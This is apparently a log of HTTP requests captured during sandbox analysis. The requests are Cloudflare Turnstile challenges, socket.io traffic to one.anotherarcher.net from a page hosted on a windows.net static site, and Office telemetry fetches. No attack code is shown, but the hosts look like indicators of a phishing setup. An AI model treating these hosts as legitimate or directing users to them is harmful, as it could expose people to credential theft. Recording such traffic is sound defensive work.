Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB7N0&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd84d0859428f/1727989054307/1b1c2e8345996f0791b87668bcd9721ece3a7bc9367547aa772aa6d021fc8fb9/FoEK8nluJDkZAuy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd86f5fc70ca2&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd84d0859428f/1727989054308/PhU9i5DT5iFvgSb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB7eU&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB98u HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2039740840:1727987324:6iAWAvvaUE-RR1f5VjEdMpMjA0FAo4zmykNisH4-Eow/8ccfd86f5fc70ca2/54bb74df38cddf8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd86f5fc70ca2/1727989059466/V1GlFmnFZc-pbXa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd84d0859428f/1727989054308/PhU9i5DT5iFvgSb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=QVT9suDRefEWf0f5AANg HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 75devDfZ+tWo11aqSQGBKQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB98u HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB9aG&sid=QVT9suDRefEWf0f5AANg HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/c48er/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd86f5fc70ca2/1727989059466/V1GlFmnFZc-pbXa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd86f5fc70ca2/1727989059468/8262e1a5d8c7f6e36790f7545360055c84a0e1010c841f292d392d87da925b25/GdLY_XkM0DHPAvG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB9aE&sid=QVT9suDRefEWf0f5AANg HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB9aG&sid=QVT9suDRefEWf0f5AANg HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KB9q7&sid=QVT9suDRefEWf0f5AANg HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8a398d6423a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/c48er/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd8a398d6423a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2039740840:1727987324:6iAWAvvaUE-RR1f5VjEdMpMjA0FAo4zmykNisH4-Eow/8ccfd86f5fc70ca2/54bb74df38cddf8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBANY HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/920432075:1727987543:H-hSCAuEwJhg3Sa_7UIzdahpD0yMy3z-ZDTfJupnFjk/8ccfd8a398d6423a/c5efb4b87836f3f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=UHGUuwfBOfyyJnD_AANj HTTP/1.1Host: one.anotherarcher.netConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: qnZjy7zsCFYww2+SpM+k5g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBAht&sid=UHGUuwfBOfyyJnD_AANj HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBANY HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8a398d6423a/1727989066982/3a3WyOd5DBXXcnX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/c48er/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/fkb2b/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ccfd8a398d6423a/1727989066982/3a3WyOd5DBXXcnX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBAht&sid=UHGUuwfBOfyyJnD_AANj HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBA_V&sid=UHGUuwfBOfyyJnD_AANj HTTP/1.1Host: one.anotherarcher.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P9KBAhr&sid=UHGUuwfBOfyyJnD_AANj HTTP/1.1Host: one.anotherarcher.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ccfd8a398d6423a/1727989066988/48d396f7b289986820b63ffef1e23d2108c2126f11342b0be7b7fce412970517/7keEjPdoYduUfc- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/c48er/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
